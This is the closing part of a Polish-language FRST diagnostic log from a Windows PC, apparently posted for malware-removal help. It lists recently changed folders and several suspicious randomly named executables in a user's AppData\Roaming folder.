2021-09-04 23:11 - 2019-11-02 18:45 - 000000000 ____D C:\Program Files (x86)\Google
2021-09-04 23:07 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-09-04 14:33 - 2019-09-23 10:05 - 000000000 ____D C:\EC-APPS
2021-09-04 13:41 - 2021-03-14 22:20 - 000000000 ____D C:\Users\Artur\AppData\Local\CrashDumps
2021-09-04 12:54 - 2020-05-29 13:23 - 000000000 ____D C:\Program Files (x86)\MultipointInj
2021-09-04 12:25 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\Registration
2021-09-04 10:55 - 2021-05-03 18:00 - 000001201 _____ C:\Users\Artur\Desktop\ESET Online Scanner.lnk
2021-09-04 10:35 - 2019-11-02 18:48 - 000004128 _____ C:\Windows\system32\Tasks\CCleaner Update
2021-09-04 10:05 - 2020-05-28 16:32 - 000000000 ____D C:\Program Files\DiagBox
2021-09-04 08:47 - 2019-11-02 18:47 - 000002230 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-09-04 08:47 - 2019-11-02 18:47 - 000002189 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-09-03 20:08 - 2019-09-23 13:12 - 000000000 ____D C:\Users\Artur\.oracle_jre_usage
2021-09-03 20:08 - 2019-09-09 13:31 - 000000000 ____D C:\Users\Artur
2021-09-03 17:24 - 2021-05-05 08:54 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-09-03 17:24 - 2021-05-05 08:54 - 000002192 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-08-22 09:54 - 2021-05-05 08:51 - 000003410 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-08-22 09:54 - 2021-05-05 08:51 - 000003282 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-08-05 16:52 - 2019-11-02 18:45 - 000003484 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-08-05 16:52 - 2019-11-02 18:45 - 000003356 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
 
==================== Pliki w katalogu głównym wybranych folderów ========
 
2021-09-04 10:04 - 2021-09-04 10:04 - 000166400 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\1211288.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000166912 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\2266923.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\4839901.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\5476827.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 003223840 _____ (Realtek Semiconductor Corp.) C:\Users\Artur\AppData\Roaming\5495358.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000226816 _____ () C:\Users\Artur\AppData\Roaming\7717230.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\7776951.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000226816 _____ () C:\Users\Artur\AppData\Roaming\7830778.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000320000 _____ () C:\Users\Artur\AppData\Roaming\8071467.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\8618314.exe
2021-09-04 10:05 - 2021-09-04 10:55 - 000044032 _____ (Google5 Inc.) C:\Users\Artur\AppData\Roaming\services64.exe
 
==================== SigCheck ============================
 
(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)
 
 
LastRegBack: 2021-09-01 23:14
==================== Koniec  FRST.txt ========================
Wygenerowano w 0.005s, przy pomocy GeSHi 1.0.8
'
Podziel się na Facebook Podziel się na BLIP Podziel się na Twitter Podziel się na Buzz Podziel się na Flaker Dodaj zakładkę Google Podziel się na Delicious Wykop to!

Nowy Komentarz:

Komentarze:

Brak Komentarzy!